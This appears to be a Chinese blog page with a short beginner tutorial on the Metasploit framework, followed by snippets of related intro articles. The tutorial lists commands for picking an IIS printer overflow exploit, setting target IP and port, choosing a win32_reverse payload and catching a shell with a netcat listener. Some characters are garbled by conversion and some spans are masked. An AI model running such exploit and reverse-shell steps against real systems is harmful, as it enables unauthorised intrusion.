MetaSploit使用初步教程

2021-09-21 03:22:42 字數 609 閱讀 7076

metasploit是乙個漏洞開發和利用的平台,功能非常強大,在內網滲透和漏洞replay方面非常有用,其**位址為

有關平台相關的*****可以到

原文見附件metasploit使用初步教程,其實很簡單,主要有以下幾步:

(1)安裝metasploit

(2)執行metasploit

(3)執行show exploits

(4)選擇相應的exploits

(5)檢視exploits。例如info iis50_printer_overflow

(6)使用exploits,例如use iis50_printer_overflow

(7)設定需要溢位程式的引數,例如設定埠和ip位址等。

(8)檢查看能否溢位伺服器或者pc ,執行check命令

(9)檢視選項,show options,show payloads

(10)檢視溢位的一些選項,info win32_reverse

(11)設定溢位選項,set payload win32_reverse

(12)使用nc監聽,以獲取shell,nc -l -p 4321

大致就這些吧,具體需要自己去體會。呵呵。

附件:

Metasploit的使用 入門

1.1 簡介 metasploit是一款開源安全漏洞檢測工具,附帶數百個已知的軟體漏洞,並保持頻繁更新。被安全社群冠以 可以黑掉整個宇宙 之名的強大滲透測試框架。metasploit framework最初是hd moore個人的想法,當時他在一家安全公司工作,他於2003年10月發布了第乙個基於p...

使用metasploit錯誤合集

問題 使用search命令提示不能啟動資料庫 解決辦法 kali 2.0 已經沒有metasploit 這個服務了,所以service metasploit start 的方式不起作用。在kali 2.0中啟動帶資料庫支援的msf方式如下 1 首先啟動postgresql資料庫 etc init.d...

Metasploit的基本使用

參考文獻 環境 ubuntu metasploit簡介 metasploit是一款開源安全漏洞檢測工具,附帶數百個已知的軟體漏洞。msf終端 msf終端是metasploit的使用者介面,它提供了一站式的介面,能夠訪問metasploit框架中幾乎每乙個選項和配置 安裝cd opt mv msfup...